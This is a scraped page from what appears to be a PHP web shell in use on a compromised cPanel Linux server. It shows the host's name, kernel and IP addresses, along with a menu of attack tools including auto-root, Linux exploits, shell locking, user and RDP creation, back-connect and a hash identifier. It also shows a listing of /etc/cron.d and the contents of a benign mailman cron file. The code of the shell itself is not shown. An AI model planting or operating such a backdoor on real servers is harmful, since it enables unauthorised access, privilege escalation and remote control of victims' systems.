Linux server.netcare.mx 5.14.0-687.5.4.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 28 09:20:26 EDT 2026 x86_64
Apache
: 50.6.229.13 | : 216.73.217.35
106 Domain
8.2.31
qdmc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
cron.d /
[ HOME SHELL ]
Name
Size
Permission
Action
0hourly
128
B
-rw-r--r--
backup_jobs_helper
547
B
-rw-r--r--
clean_techproxy
141
B
-rw-r--r--
comet_license_sync
433
B
-rw-r--r--
cpanel-analytics
131
B
-rw-------
cpanel_autossl
75
B
-rw-------
imunify-antivirus
789
B
-rw-r--r--
imunify-core
292
B
-rw-r--r--
imunify-notifier
144
B
-rw-r--r--
mailman
2.05
KB
-rw-r--r--
run_arping_cron
108
B
-rw-r--r--
softaculous
316
B
-rw-r--r--
softaculous2
158
B
-rw-r--r--
sys-snap
42
B
-rw-r--r--
tempftp
134
B
-rw-r--r--
ul_load_stats
108
B
-rw-r--r--
ulpatch
135
B
-rw-r-----
wordpress_update_local
95
B
-rw-r--r--
wp-toolkit-update
881
B
-rw-r--r--
yum
116
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mailman
SHELL=/bin/bash MAILTO=postmaster # At 8AM every day, mail reminders to admins as to pending requests. # They are less likely to ignore these reminders if they're mailed # early in the morning, but of course, this is local time... ;) 0 8 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python3 -S /usr/local/cpanel/3rdparty/mailman/cron/checkdbs # # At 9AM, send notifications to disabled members that are due to be # reminded to re-enable their accounts. 0 9 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python3 -S /usr/local/cpanel/3rdparty/mailman/cron/disabled # # Noon, mail digests for lists that do periodic as well as threshhold delivery. 0 12 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python3 -S /usr/local/cpanel/3rdparty/mailman/cron/senddigests # # 5 AM on the first of each month, mail out password reminders. 0 5 1 * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python3 -S /usr/local/cpanel/3rdparty/mailman/cron/mailpasswds # # Every 5 mins, try to gate news to mail. You can comment this one out # if you don't want to allow gating, or don't have any going on right now, # or want to exclusively use a callback strategy instead of polling. #0,5,10,15,20,25,30,35,40,45,50,55 * * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python3 -S /usr/local/cpanel/3rdparty/mailman/cron/gate_news # # At 3:27am every night, regenerate the gzip'd archive file. Only # turn this on if the internal archiver is used and # GZIP_ARCHIVE_TXT_FILES is false in mm_cfg.py 27 3 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python3 -S /usr/local/cpanel/3rdparty/mailman/cron/nightly_gzip # # At 4:30AM daily, cull old entries from the 'bad' and 'shunt' queues. 30 4 * * * mailman /usr/local/cpanel/scripts/restartsrv_mailman --status &> /dev/null && /usr/bin/python3 -S /usr/local/cpanel/3rdparty/mailman/cron/cull_bad_shunt
Close